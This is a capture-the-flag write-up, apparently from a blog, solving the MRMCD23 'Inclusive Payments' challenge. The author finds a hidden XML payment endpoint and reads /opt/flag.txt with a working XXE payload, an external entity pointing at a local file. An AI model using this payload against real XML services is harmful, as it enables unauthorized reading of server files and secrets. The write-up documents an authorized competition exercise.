MRMCD23: Inclusive Payments // ebin.wtf

Task

So we built this new payment interface, right? You know, the new, super secure one? Yeah, our new intern totally insists that he can hack it! I told him I’d double his paycheck this month if he succeeds, otherwise he’ll be fired. Pff, what an idiot.
Disclose the content of /opt/flag.txt!

The provided URL was the following:

https://ctf.mrmcd.net/agil/

They also provided two hints:

Hint 1

XML was the shit back in the day, let me tell ya!

Hint 2

I’m more of a JSON person tbh, XML is a bit too dynamic for my taste.

Solution

First I had to guess the correct URL, since the provided URL returns HTTP status code 404 (page not found).

Because it is a payment service, I simply tried the path /payment, which returned HTTP status code 405 (method not allowed) after sending a GET request. Sending an OPTIONS request reveals, that only OPTIONS and PUT requests are allowed. So I tried PUT with an empty XML, which returned HTTP status code 500 (internal server error) with the following content:

invalid payment xml

So I tried building the XML hoping that the server will tell me how to do it properly. The next try looked like this:

<?xml version="1.0" encoding="utf-8"?>
<payment>
</payment>

Which resulted in:

invalid amount

Now it was just very easy trial and error and I was able to send PUT requests with valid XMLs:

<?xml version="1.0" encoding="utf-8"?>
<payment>
	<amount>1337</amount>
	<currency>EUR</currency>
	<sender>Dagobert</sender>
	<receiver>ebin</receiver>
	<narrativeText>very ebin transaction</narrativeText>
</payment>

Resulting in following response:

payment created: 67916777-4998-11ee-bd93-0242ac13000d

Nice, now we are able to GET answers, so I sent a GET request requesting the following path /payment/67916777-4998-11ee-bd93-0242ac13000d

The response contains the XML we originally sent. Now it’s time to send a malicious XML to obtain the secret, since the hint was about XML being too dynamic:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///opt/flag.txt"> ]>
<payment>
	<amount>1337</amount>
	<currency>EUR</currency>
	<sender>Dagobert</sender>
	<receiver>ebin</receiver>
	<narrativeText>&xxe;</narrativeText>
</payment>

Response:

<?xml version=\"1.0\" ?>
<payment>
   <uuid>6eb99f2d-490e-11ee-bd93-0242ac13000d</uuid>
   <sender>Dagobert</sender>
   <receiver>ebin</receiver>
   <amount>1337</amount>
   <currency>EUR</currency>
   <narrativeText>MRMCD2023{70d4y_15_p4yd4y_wh00p_wh00p}</narrativeText>
</payment>

That was it, this is the flag:

MRMCD2023{70d4y_15_p4yd4y_wh00p_wh00p}

Solved by petrosyan